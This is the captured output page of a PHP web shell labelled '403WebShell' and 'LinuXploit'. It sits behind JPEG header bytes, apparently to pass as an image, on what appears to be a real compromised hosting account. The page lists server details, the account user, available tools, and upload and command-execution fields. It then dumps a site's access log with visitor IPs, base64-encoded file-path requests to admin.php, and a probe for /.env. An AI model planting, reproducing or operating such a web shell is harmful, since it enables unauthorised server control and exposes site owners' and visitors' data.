����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 162.0.232.25  /  Your IP : 3.137.177.116
Web Server : LiteSpeed
System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : kwacuqig ( 988)
PHP Version : 8.2.26
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/kwacuqig/access-logs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/kwacuqig/access-logs/voltify.malawisounds.com
13.52.75.88 - - [03/Jan/2025:18:51:36 -0500] "GET / HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
13.52.75.88 - - [03/Jan/2025:18:51:36 -0500] "GET /login.php HTTP/1.1" 200 1835 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:51 -0500] "GET / HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:52 -0500] "GET /login.php HTTP/1.1" 200 1835 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
45.55.112.20 - - [04/Jan/2025:01:41:52 -0500] "GET / HTTP/1.1" 302 0 "162.0.232.25" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
120.188.7.253 - - [04/Jan/2025:01:41:52 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 25198 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:52 -0500] "GET /css/font-awesome.min.css HTTP/1.1" 200 7025 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
104.248.75.7 - - [04/Jan/2025:01:41:52 -0500] "GET /login.php HTTP/1.1" 200 1835 "162.0.232.25" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
104.248.75.7 - - [04/Jan/2025:01:41:53 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 25198 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
120.188.7.253 - - [04/Jan/2025:01:41:54 -0500] "GET /css/owl.carousel.css HTTP/1.1" 200 562 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:54 -0500] "GET /css/owl.theme.css HTTP/1.1" 200 640 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:54 -0500] "GET /css/owl.transitions.css HTTP/1.1" 200 800 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:55 -0500] "GET /css/animate.css HTTP/1.1" 200 6436 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:55 -0500] "GET /css/normalize.css HTTP/1.1" 200 2868 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:55 -0500] "GET /css/scrollbar/jquery.mCustomScrollbar.min.css HTTP/1.1" 200 5523 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:55 -0500] "GET /css/wave/waves.min.css HTTP/1.1" 200 1090 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:56 -0500] "GET /css/notika-custom-icon.css HTTP/1.1" 200 901 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:56 -0500] "GET /css/main.css HTTP/1.1" 200 2233 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:56 -0500] "GET /style.css HTTP/1.1" 200 26538 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:56 -0500] "GET /css/responsive.css HTTP/1.1" 200 3609 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:56 -0500] "GET /js/vendor/modernizr-2.8.3.min.js HTTP/1.1" 200 6806 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:57 -0500] "GET /js/sweetalert.min.js HTTP/1.1" 200 13840 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:57 -0500] "GET /js/vendor/jquery-1.12.4.min.js HTTP/1.1" 200 39406 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:58 -0500] "GET /js/bootstrap.min.js HTTP/1.1" 200 11804 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:58 -0500] "GET /js/wow.min.js HTTP/1.1" 200 3063 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:58 -0500] "GET /js/jquery-price-slider.js HTTP/1.1" 200 8355 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:58 -0500] "GET /js/owl.carousel.min.js HTTP/1.1" 200 7616 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:59 -0500] "GET /js/jquery.scrollUp.min.js HTTP/1.1" 200 967 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:59 -0500] "GET /js/meanmenu/jquery.meanmenu.js HTTP/1.1" 200 3944 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:59 -0500] "GET /fonts/notika-icon.ttf?qzfrsz HTTP/1.1" 200 24080 "http://voltify.malawisounds.com/style.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
192.241.137.43 - - [04/Jan/2025:01:41:59 -0500] "GET /js/meanmenu/jquery.meanmenu.js HTTP/1.1" 200 3944 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
120.188.7.253 - - [04/Jan/2025:01:41:59 -0500] "GET /js/counterup/jquery.counterup.min.js HTTP/1.1" 200 587 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:41:59 -0500] "GET /js/counterup/waypoints.min.js HTTP/1.1" 200 2907 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:00 -0500] "GET /js/counterup/counterup-active.js HTTP/1.1" 200 204 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:00 -0500] "GET /js/scrollbar/jquery.mCustomScrollbar.concat.min.js HTTP/1.1" 200 15146 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
192.241.137.43 - - [04/Jan/2025:01:42:00 -0500] "GET /js/scrollbar/jquery.mCustomScrollbar.concat.min.js HTTP/1.1" 200 15146 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
120.188.7.253 - - [04/Jan/2025:01:42:01 -0500] "GET /js/sparkline/jquery.sparkline.min.js HTTP/1.1" 200 15094 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:01 -0500] "GET /js/sparkline/sparkline-active.js HTTP/1.1" 200 279 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:02 -0500] "GET /js/flot/jquery.flot.js HTTP/1.1" 200 33971 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:03 -0500] "GET /js/flot/jquery.flot.resize.js HTTP/1.1" 200 1498 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:03 -0500] "GET /js/flot/flot-active.js HTTP/1.1" 200 2822 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:04 -0500] "GET /js/knob/jquery.knob.js HTTP/1.1" 200 7146 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:04 -0500] "GET /js/knob/jquery.appear.js HTTP/1.1" 200 1406 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:04 -0500] "GET /js/chat/jquery.chat.js HTTP/1.1" 200 866 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:04 -0500] "GET /js/knob/knob-active.js HTTP/1.1" 200 385 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:04 -0500] "GET /js/wave/waves.min.js HTTP/1.1" 200 2490 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
45.55.112.20 - - [04/Jan/2025:01:42:04 -0500] "GET /js/chat/jquery.chat.js HTTP/1.1" 200 866 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
120.188.7.253 - - [04/Jan/2025:01:42:04 -0500] "GET /js/wave/wave-active.js HTTP/1.1" 200 192 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:04 -0500] "GET /js/icheck/icheck.min.js HTTP/1.1" 200 2363 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:05 -0500] "GET /js/icheck/icheck-active.js HTTP/1.1" 200 172 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:05 -0500] "GET /js/todo/jquery.todo.js HTTP/1.1" 200 1614 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:05 -0500] "GET /js/login/login-action.js HTTP/1.1" 200 328 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:05 -0500] "GET /js/main.js HTTP/1.1" 200 1561 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:01:42:05 -0500] "GET /js/plugins.js HTTP/1.1" 200 390 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
192.241.137.43 - - [04/Jan/2025:01:42:05 -0500] "GET /js/todo/jquery.todo.js HTTP/1.1" 200 1614 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
120.188.7.253 - - [04/Jan/2025:01:42:06 -0500] "GET /img/favicon.ico HTTP/1.1" 200 18686 "http://voltify.malawisounds.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
198.204.240.42 - - [04/Jan/2025:01:49:38 -0500] "GET /index.php?params=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36"
198.204.240.42 - - [04/Jan/2025:01:49:38 -0500] "GET /login.php HTTP/1.1" 200 7814 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:02:00:27 -0500] "GET /admin.php HTTP/1.1" 200 3508 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:02:00:35 -0500] "GET /favicon.ico HTTP/1.1" 404 1251 "http://voltify.malawisounds.com/admin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
120.188.7.253 - - [04/Jan/2025:02:02:35 -0500] "GET /admin.php?file=L2hvbWUva3dhY3VxaWcvdm9sdGlmeS5tYWxhd2lzb3VuZHMuY29tL2luZGV4LnBocA==&dir=L2hvbWUva3dhY3VxaWcvdm9sdGlmeS5tYWxhd2lzb3VuZHMuY29t HTTP/1.1" 200 3621 "http://voltify.malawisounds.com/admin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
45.84.139.146 - - [04/Jan/2025:05:17:31 -0500] "GET /.env HTTP/1.1" 404 1251 "-" "Go-http-client/1.1"

Youez - 2016 - github.com/yon3zu
LinuXploit